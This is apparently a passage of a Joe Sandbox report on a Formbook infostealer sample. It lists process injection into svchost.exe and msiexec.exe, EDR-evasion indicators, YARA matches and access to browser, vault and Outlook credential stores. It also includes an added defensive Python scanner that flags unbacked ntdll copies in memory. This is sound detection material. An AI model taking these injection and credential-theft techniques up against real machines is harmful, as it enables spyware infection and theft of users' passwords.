            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036F6BD7 | 2_2_036F6BD7
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0363EA80 | 2_2_0363EA80
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03656962 | 2_2_03656962
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036429A0 | 2_2_036429A0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0370A9A6 | 2_2_0370A9A6
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0364A840 | 2_2_0364A840
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03642840 | 2_2_03642840
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0366E8F0 | 2_2_0366E8F0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036268B8 | 2_2_036268B8
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036B4F40 | 2_2_036B4F40
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03682F28 | 2_2_03682F28
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03660F30 | 2_2_03660F30
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036E2F30 | 2_2_036E2F30
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0364CFE0 | 2_2_0364CFE0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03632FC8 | 2_2_03632FC8
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036BEFA0 | 2_2_036BEFA0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03640E59 | 2_2_03640E59
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036FEE26 | 2_2_036FEE26
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036FEEDB | 2_2_036FEEDB
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03652E90 | 2_2_03652E90
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036FCE93 | 2_2_036FCE93
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0364AD00 | 2_2_0364AD00
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036DCD1F | 2_2_036DCD1F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363ADE02_2_0363ADE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03658DBF2_2_03658DBF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640C002_2_03640C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03630CF22_2_03630CF2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E0CB52_2_036E0CB5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362D34C2_2_0362D34C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F132D2_2_036F132D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0368739A2_2_0368739A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E12ED2_2_036E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365B2C02_2_0365B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036452A02_2_036452A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0367516C2_2_0367516C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362F1722_2_0362F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0370B16B2_2_0370B16B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364B1B02_2_0364B1B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F70E92_2_036F70E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036FF0E02_2_036FF0E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036EF0CC2_2_036EF0CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036470C02_2_036470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036FF7B02_2_036FF7B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036856302_2_03685630
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F16CC2_2_036F16CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F75712_2_036F7571
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037095C32_2_037095C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DD5B02_2_036DD5B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036314602_2_03631460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036FF43F2_2_036FF43F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036FFB762_2_036FFB76
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B5BF02_2_036B5BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0367DBF92_2_0367DBF9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365FB802_2_0365FB80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B3A6C2_2_036B3A6C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036FFA492_2_036FFA49
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F7A462_2_036F7A46
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036EDAC62_2_036EDAC6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DDAAC2_2_036DDAAC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03685AA02_2_03685AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E1AA32_2_036E1AA3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036499502_2_03649950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365B9502_2_0365B950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D59102_2_036D5910
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AD8002_2_036AD800
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036438E02_2_036438E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036FFF092_2_036FFF09
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036FFFB12_2_036FFFB1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03641F922_2_03641F92
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03649EB02_2_03649EB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F7D732_2_036F7D73
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03643D402_2_03643D40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F1D5A2_2_036F1D5A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365FDC02_2_0365FDC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B9C322_2_036B9C32
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036FFCF22_2_036FFCF2
Source: C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exe    Code functions (each reported as 3_2_<address>):
    04206D30, 04226434, 0420F454, 04208D04, 04206D84, 04208AE4, 04208ADB,
    06A306EC, 06A306F5, 06A35535, 06A37065, 06A4E045, 06A2E995, 06A30915
Source: C:\Windows\SysWOW64\msiexec.exe    Code functions (each reported as 4_2_<address>):
    04502446, 044FE4F6, 04450535, 04510591, 0446C6E0, 04474750, 04450770, 0444C7C0, 044E2000, 044D8158,
    04440100, 044EA118, 045081CC, 045101AA, 044F0274, 044D02C0, 0450A352, 0445E3F0, 045103E6, 04450C00,
    04440CF2, 044F0CB5, 0445AD00, 044ECD1F, 0444ADE0, 04468DBF, 04450E59, 0450EE26, 0450EEDB, 0450CE93,
    04462E90, 044C4F40, 04492F28, 04470F30, 04442FC8, 0445CFE0, 044CEFA0, 04452840, 0445A840, 0447E8F0,
    044368B8, 04466962, 044529A0, 0451A9A6, 0444EA80, 0450AB40, 04506BD7, 04441460, 0450F43F, 04507571,
    044ED5B0, 045016CC, 0450F7B0, 044FF0CC, 044570C0, 0450F0E0, 045070E9, 0448516C, 0443F172, 0451B16B,
    0445B1B0, 0446B2C0, 044F12ED, 044552A0, 0443D34C, 0450132D, 0449739A, 044C9C32, 0450FCF2, 04453D40,
    04501D5A, 04507D73, 0446FDC0, 04459EB0, 0450FF09, 04451F92, 0450FFB1, 044BD800, 044538E0, 04459950,
    0446B950, 044E5910, 04507A46, 0450FA49, 044C3A6C, 044FDAC6, 044EDAAC, 04495AA0, 0450FB76, 0448DBF9,
    044C5BF0, 0446FB80, 00121A00, 0013A510, 00123530, 0011CBB7, 0011CBC0, 0011CDE0, 0011AE60, 041BC03D,
    041BB0A8, 041BC1CE, 041BBCA3, 041BBB84
Source: C:\Windows\SysWOW64\svchost.exe    Code function: String function: 03675130 appears 58 times
Source: C:\Windows\SysWOW64\svchost.exe    Code function: String function: 036BF290 appears 105 times
Source: C:\Windows\SysWOW64\svchost.exe    Code function: String function: 036AEA12 appears 86 times
Source: C:\Windows\SysWOW64\svchost.exe    Code function: String function: 0362B970 appears 280 times
Source: C:\Windows\SysWOW64\svchost.exe    Code function: String function: 03687E54 appears 111 times
Source: C:\Windows\SysWOW64\msiexec.exe    Code function: String function: 044BEA12 appears 86 times
Source: C:\Windows\SysWOW64\msiexec.exe    Code function: String function: 044CF290 appears 105 times
Source: C:\Windows\SysWOW64\msiexec.exe    Code function: String function: 04485130 appears 58 times
Source: C:\Windows\SysWOW64\msiexec.exe    Code function: String function: 04497E54 appears 101 times
Source: C:\Windows\SysWOW64\msiexec.exe    Code function: String function: 0443B970 appears 275 times
Source: C:\Users\user\Desktop\0XLuA614VK.exe    Code function: String function: 00F40A30 appears 46 times
Source: C:\Users\user\Desktop\0XLuA614VK.exe    Code function: String function: 00F29CB3 appears 31 times
Source: C:\Users\user\Desktop\0XLuA614VK.exe    Code function: String function: 00F3F9F2 appears 40 times
Each of the five svchost.exe string-function addresses sits exactly 0xE10000 below its msiexec.exe counterpart (03675130/04485130, 036BF290/044CF290, 036AEA12/044BEA12, 0362B970/0443B970, 03687E54/04497E54) with near-identical call counts, so both processes are running the same injected code body relocated to two different bases.
Source: 0XLuA614VK.exe, 00000000.00000003.2046499166.0000000003A43000.00000004.00001000.00020000.00000000.sdmp    Binary or memory string: OriginalFilenamentdll.dllj% vs 0XLuA614VK.exe
Source: 0XLuA614VK.exe, 00000000.00000003.2044891936.0000000003B9D000.00000004.00001000.00020000.00000000.sdmp    Binary or memory string: OriginalFilenamentdll.dllj% vs 0XLuA614VK.exe
Source: 0XLuA614VK.exe    Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
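The two memory-string hits above are a PE whose version resource names it ntdll.dll, found in the sample's own memory at 0x3A43000 and 0x3B9D000 rather than at the base of the ntdll.dll the loader mapped. That is what a freshly read second copy of ntdll looks like, and it fits the direct/indirect-syscall and EDR-bypass signatures this report raises. The following is an added example, not part of the Joe Sandbox report or of its tooling: a Python scanner that walks a dumped memory region for DOS/PE headers, decodes the same IMAGE_FILE_HEADER characteristics that the static-PE line lists, pulls the version-info OriginalFilename string, and flags any image whose address is not in the process's loaded-module list. The region base, the module list and the header-only image it scans are constructed test data (the fake image is not a real ntdll), and the 0x77000000 ImageBase is an arbitrary value.

```python
import struct

# IMAGE_FILE_HEADER.Characteristics bits and machine IDs from the PE/COFF specification
CHARACTERISTICS = {
    0x0002: "EXECUTABLE_IMAGE",
    0x0020: "LARGE_ADDRESS_AWARE",
    0x0100: "32BIT_MACHINE",
    0x2000: "DLL",
}
MACHINES = {0x014C: "i386", 0x8664: "amd64"}
ORIGINAL_FILENAME_KEY = "OriginalFilename".encode("utf-16-le")


def parse_pe(buf, off):
    """Describe the PE image whose DOS header starts at buf[off]; None if it is not one."""
    if buf[off:off + 2] != b"MZ" or off + 0x40 > len(buf):
        return None
    e_lfanew = struct.unpack_from("<I", buf, off + 0x3C)[0]
    pe = off + e_lfanew
    if not 0x40 <= e_lfanew <= 0x400 or pe + 24 + 60 > len(buf) or buf[pe:pe + 4] != b"PE\0\0":
        return None
    machine, nsections, _, _, _, _opt_size, chars = struct.unpack_from("<HHIIIHH", buf, pe + 4)
    opt = pe + 24                                   # IMAGE_OPTIONAL_HEADER
    magic = struct.unpack_from("<H", buf, opt)[0]
    if magic == 0x10B:                              # PE32: ImageBase is a DWORD at +28
        image_base = struct.unpack_from("<I", buf, opt + 28)[0]
    elif magic == 0x20B:                            # PE32+: ImageBase is a QWORD at +24
        image_base = struct.unpack_from("<Q", buf, opt + 24)[0]
    else:
        return None
    return {
        "offset": off,
        "machine": MACHINES.get(machine, hex(machine)),
        "sections": nsections,
        "characteristics": [n for bit, n in sorted(CHARACTERISTICS.items()) if chars & bit],
        "image_base": image_base,
        "size_of_image": struct.unpack_from("<I", buf, opt + 56)[0],
    }


def original_filename(buf, start, end):
    """Value of the VS_VERSION_INFO 'OriginalFilename' string in buf[start:end], or None."""
    i = buf.find(ORIGINAL_FILENAME_KEY, start, end)
    if i < 0:
        return None
    j = i + len(ORIGINAL_FILENAME_KEY)
    while j + 1 < end and buf[j] == 0:              # key terminator plus DWORD padding
        j += 1
    out = []
    while j + 1 < end:                              # UTF-16LE value up to its terminator
        unit = struct.unpack_from("<H", buf, j)[0]
        if unit == 0:
            break
        out.append(chr(unit))
        j += 2
    return "".join(out)


def scan_region(buf, region_base, loaded_modules):
    """Find PE headers in a dumped region; a hit not in loaded_modules is an unbacked image."""
    findings = []
    off = buf.find(b"MZ")
    while off >= 0:
        info = parse_pe(buf, off)
        if info is not None:
            addr = region_base + off
            end = min(len(buf), off + info["size_of_image"])
            info.update(address=addr,
                        backed_by=loaded_modules.get(addr),
                        original_filename=original_filename(buf, off, end))
            findings.append(info)
        off = buf.find(b"MZ", off + 2)
    return findings


def build_header_only_pe32(original_name, characteristics):
    """Constructed test input: a header-only PE32 with a fake version string (not a real binary)."""
    dos = bytearray(0x80)
    dos[0:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x80)                      # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x014C, 3, 0, 0, 0, 0xE0, characteristics)
    opt = bytearray(0xE0)
    struct.pack_into("<H", opt, 0, 0x10B)                        # PE32 magic
    struct.pack_into("<I", opt, 28, 0x77000000)                  # ImageBase (arbitrary)
    struct.pack_into("<I", opt, 56, 0x1A0000)                    # SizeOfImage
    version = (ORIGINAL_FILENAME_KEY + b"\0\0" + b"\0\0"
               + original_name.encode("utf-16-le") + b"\0\0")
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt) + b"\0" * 0x200 + version


# Constructed dump: a region at 0x03A40000 whose only PE sits 0x3000 in, i.e. at 0x03A43000,
# while the (also made-up) loaded-module list knows ntdll.dll only at its mapped base.
REGION_BASE = 0x03A40000
DUMP = b"\0" * 0x3000 + build_header_only_pe32("ntdll.dll", 0x2122)
LOADED_MODULES = {0x77000000: "ntdll.dll"}   # assumed module list for the example

if __name__ == "__main__":
    for f in scan_region(DUMP, REGION_BASE, LOADED_MODULES):
        tag = "backed by " + f["backed_by"] if f["backed_by"] else "UNBACKED"
        print(f"PE at {f['address']:#010x} OriginalFilename={f['original_filename']} "
              f"{f['machine']} {','.join(f['characteristics'])} ({tag})")
```

On a live system the same check is done against the module list the loader keeps (PEB Ldr data) or a Sysmon/EDR image-load history; a PE header at an address no loader event explains is worth a closer look regardless of what its version resource claims.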
Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE    Matched rule: Windows_Trojan_Formbook_1112e116 (reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23)
The same rule, Windows_Trojan_Formbook_1112e116, also matched each of the following sources:
Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: 00000002.00000002.2203489925.0000000005000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: 00000003.00000002.4491976479.0000000006A20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: 00000004.00000002.4487941986.0000000002590000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: 00000002.00000002.2202835266.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: 00000002.00000002.2203112079.0000000003480000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: 00000004.00000002.4487732507.0000000000110000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: 00000004.00000002.4487977474.00000000025D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: 00000003.00000002.4488832936.00000000041A0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: classification engine    Classification label: mal100.troj.spyw.evad.winEXE@7/5@17/7
Source: C:\Users\user\Desktop\0XLuA614VK.exe    Code function: 0_2_00F937B5 GetLastError,FormatMessageW
Source: C:\Users\user\Desktop\0XLuA614VK.exe    Code function: 0_2_00F810BF AdjustTokenPrivileges,CloseHandle
Source: C:\Users\user\Desktop\0XLuA614VK.exe    Code function: 0_2_00F816C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError
Source: C:\Users\user\Desktop\0XLuA614VK.exe    Code function: 0_2_00F951CD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode
Source: C:\Users\user\Desktop\0XLuA614VK.exe    Code function: 0_2_00FAA67C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle
Source: C:\Users\user\Desktop\0XLuA614VK.exe    Code function: 0_2_00F9648E _wcslen,CoInitialize,CoCreateInstance,CoUninitialize
Source: C:\Users\user\Desktop\0XLuA614VK.exe    Code function: 0_2_00F242A2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource
Source: C:\Users\user\Desktop\0XLuA614VK.exe    File created: C:\Users\user\AppData\Local\Temp\autC864.tmp
Source: 0XLuA614VK.exe    Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Program Files\Mozilla Firefox\firefox.exe    File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Users\user\Desktop\0XLuA614VK.exe    Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: msiexec.exe, 00000004.00000002.4488021727.000000000270A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.4488021727.00000000026DE000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000004.00000003.2390591193.00000000026DE000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000004.00000003.2392407706.00000000026E7000.00000004.00000020.00020000.00000000.sdmp    Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: 0XLuA614VK.exe    ReversingLabs: Detection: 60%
Source: unknown    Process created: C:\Users\user\Desktop\0XLuA614VK.exe "C:\Users\user\Desktop\0XLuA614VK.exe"
Source: C:\Users\user\Desktop\0XLuA614VK.exe    Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\0XLuA614VK.exe"
Source: C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exe    Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
Source: C:\Windows\SysWOW64\msiexec.exe    Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\0XLuA614VK.exe    Sections loaded: wsock32.dll, version.dll, winmm.dll, mpr.dll, wininet.dll, iphlpapi.dll, userenv.dll, uxtheme.dll, kernel.appcore.dll, windows.storage.dll, wldp.dll, ntmarta.dll
Source: C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exe    Sections loaded: apphelp.dll, wininet.dll, mswsock.dll, dnsapi.dll, iphlpapi.dll, fwpuclnt.dll, rasadhlp.dll
Source: C:\Windows\SysWOW64\msiexec.exe    Sections loaded: apphelp.dll, aclayers.dll, mpr.dll, sfc.dll, sfc_os.dll, wininet.dll, kernel.appcore.dll, uxtheme.dll, ieframe.dll, iertutil.dll, netapi32.dll, version.dll, userenv.dll, winhttp.dll, wkscli.dll, netutils.dll, sspicli.dll, windows.storage.dll, wldp.dll, profapi.dll, secur32.dll, mlang.dll, propsys.dll, winsqlite3.dll
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
            Source: 0XLuA614VK.exe | Static file information: File size 1296896 > 1048576
            Source: 0XLuA614VK.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
            Source: 0XLuA614VK.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
            Source: 0XLuA614VK.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
            Source: 0XLuA614VK.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: 0XLuA614VK.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
            Source: 0XLuA614VK.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
            Source: 0XLuA614VK.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: msiexec.pdb source: svchost.exe, 00000002.00000003.2171842746.000000000301A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2171888846.000000000303B000.00000004.00000020.00020000.00000000.sdmp, sXmdPDASzrmzi.exe, 00000003.00000003.2279705899.00000000010A9000.00000004.00000001.00020000.00000000.sdmp, sXmdPDASzrmzi.exe, 00000003.00000003.2141716372.00000000010A5000.00000004.00000001.00020000.00000000.sdmp, sXmdPDASzrmzi.exe, 00000003.00000003.2141716372.000000000109B000.00000004.00000001.00020000.00000000.sdmp
            Source: Binary string: msiexec.pdbGCTL source: svchost.exe, 00000002.00000003.2171842746.000000000301A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2171888846.000000000303B000.00000004.00000020.00020000.00000000.sdmp, sXmdPDASzrmzi.exe, 00000003.00000003.2279705899.00000000010A9000.00000004.00000001.00020000.00000000.sdmp, sXmdPDASzrmzi.exe, 00000003.00000003.2141716372.00000000010A5000.00000004.00000001.00020000.00000000.sdmp, sXmdPDASzrmzi.exe, 00000003.00000003.2141716372.000000000109B000.00000004.00000001.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: sXmdPDASzrmzi.exe, 00000003.00000002.4487730096.000000000005E000.00000002.00000001.01000000.00000004.sdmp
            Source: Binary string: wntdll.pdbUGP source: 0XLuA614VK.exe, 00000000.00000003.2044530612.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, 0XLuA614VK.exe, 00000000.00000003.2044779565.00000000038D0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2203138542.0000000003600000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2111792201.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2203138542.000000000379E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2113590946.0000000003400000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000004.00000003.2203188667.00000000040B9000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.4488723938.00000000045AE000.00000040.00001000.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.4488723938.0000000004410000.00000040.00001000.00020000.00000000.sdmp, msiexec.exe, 00000004.00000003.2212872655.0000000004267000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: 0XLuA614VK.exe, 00000000.00000003.2044530612.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, 0XLuA614VK.exe, 00000000.00000003.2044779565.00000000038D0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.2203138542.0000000003600000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2111792201.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2203138542.000000000379E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2113590946.0000000003400000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, msiexec.exe, 00000004.00000003.2203188667.00000000040B9000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.4488723938.00000000045AE000.00000040.00001000.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.4488723938.0000000004410000.00000040.00001000.00020000.00000000.sdmp, msiexec.exe, 00000004.00000003.2212872655.0000000004267000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: sXmdPDASzrmzi.exe, 00000003.00000002.4490540012.00000000045EC000.00000004.80000000.00040000.00000000.sdmp, msiexec.exe, 00000004.00000002.4488021727.0000000002663000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.4489252166.0000000004A3C000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000006.00000002.2496207434.000000003B6FC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: sXmdPDASzrmzi.exe, 00000003.00000002.4490540012.00000000045EC000.00000004.80000000.00040000.00000000.sdmp, msiexec.exe, 00000004.00000002.4488021727.0000000002663000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.4489252166.0000000004A3C000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000006.00000002.2496207434.000000003B6FC000.00000004.80000000.00040000.00000000.sdmp
            Source: 0XLuA614VK.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: 0XLuA614VK.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: 0XLuA614VK.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: 0XLuA614VK.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: 0XLuA614VK.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
            Source: C:\Users\user\Desktop\0XLuA614VK.exe | Code function: 0_2_00F242DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo | 0_2_00F242DE
            Source: C:\Users\user\Desktop\0XLuA614VK.exe | Code function: 0_2_00F40A76 push ecx; ret | 0_2_00F40A89
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0041A81A pushfd ; iretd | 2_2_0041A81B
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004160C3 push edx; retf 9A79h | 2_2_0041611B
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00418167 push ecx; retf | 2_2_00418168
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0041699E push esi; retf | 2_2_004169A0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004249A3 push edi; ret | 2_2_004249AE
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004149BA push esi; retf | 2_2_004149BB
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00417A39 push edx; ret | 2_2_00417A8A
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00417A8B push edx; ret | 2_2_00417A8A
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00413B88 push ds; iretd | 2_2_00413BAE
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00413B93 push ds; iretd | 2_2_00413BAE
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00413C06 push ds; iretd | 2_2_00413BAE
